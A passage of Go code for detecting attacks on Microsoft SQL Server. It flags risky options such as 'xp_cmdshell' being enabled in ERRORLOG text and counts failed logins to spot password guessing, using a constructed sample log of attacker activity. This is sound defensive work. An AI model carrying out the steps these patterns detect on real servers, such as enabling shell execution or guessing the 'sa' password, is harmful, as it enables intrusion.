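var configChange = regexp.MustCompile(`Configuration option '([^']+)' changed from (\d+) to (\d+)`)

// loginFailure matches error 18456 as logged with the client address.
var loginFailure = regexp.MustCompile(`Login failed for user '([^']+)'\..*\[CLIENT: ([^\]]+)\]`)

type Alert struct {
	Line   int    // 1-based line number in the log
	Option string // option that was turned on
	Reason string
}

// ScanConfigChanges returns one Alert per risky option that went from 0 to 1.
// A 1 to 0 transition (an attacker cleaning up) is deliberately not an alert here;
// it pairs with the earlier enable, which is what gets flagged.
func ScanConfigChanges(log string) []Alert {
	var alerts []Alert
	for i, line := range strings.Split(log, "\n") {
		m := configChange.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		reason, risky := riskyOptions[m[1]]
		if !risky || m[2] != "0" || m[3] != "1" {
			continue
		}
		alerts = append(alerts, Alert{Line: i + 1, Option: m[1], Reason: reason})
	}
	return alerts
}

// FailedLoginsByClient counts failed logins per source address.
func FailedLoginsByClient(log string) map[string]int {
	counts := map[string]int{}
	for _, line := range strings.Split(log, "\n") {
		if m := loginFailure.FindStringSubmatch(line); m != nil {
			counts[m[2]]++
		}
	}
	return counts
}

// BruteForceSuspects lists clients at or above the threshold, sorted for stable output.
func BruteForceSuspects(counts map[string]int, threshold int) []string {
	var out []string
	for client, n := range counts {
		if n >= threshold {
			out = append(out, client)
		}
	}
	sort.Strings(out)
	return out
}

// sampleLog is constructed for this example in SQL Server ERRORLOG layout.
const sampleLog = `2017-02-15 10:22:33.45 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2017-02-15 10:22:33.46 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2017-02-15 10:23:01.10 spid55      Configuration option 'Ole Automation Procedures' changed from 0 to 1. Run the RECONFIGURE statement to install.
2017-02-15 10:40:12.00 spid55      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
2017-02-15 10:41:00.00 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2017-02-15 10:41:00.20 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2017-02-15 10:41:00.40 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 10.0.0.5]
2017-02-15 10:55:13.00 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.9]`

func main() {
	for _, a := range ScanConfigChanges(sampleLog) {
		fmt.Printf("line %d: option '%s' enabled (%s)\n", a.Line, a.Option, a.Reason)
	}
	for _, c := range BruteForceSuspects(FailedLoginsByClient(sampleLog), 3) {
		fmt.Printf("possible password guessing from %s\n", c)
	}
}
```

In production the same two regexes can be pointed at the ERRORLOG file directly or at the SQL Server audit feed; the option names are matched exactly as sp_configure spells them, including case.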

Link: http://feedproxy.google.com/~r/PentestTools/~3/ZIGtMzYR_7Q/msdat-microsoft-sql-database-attacking.html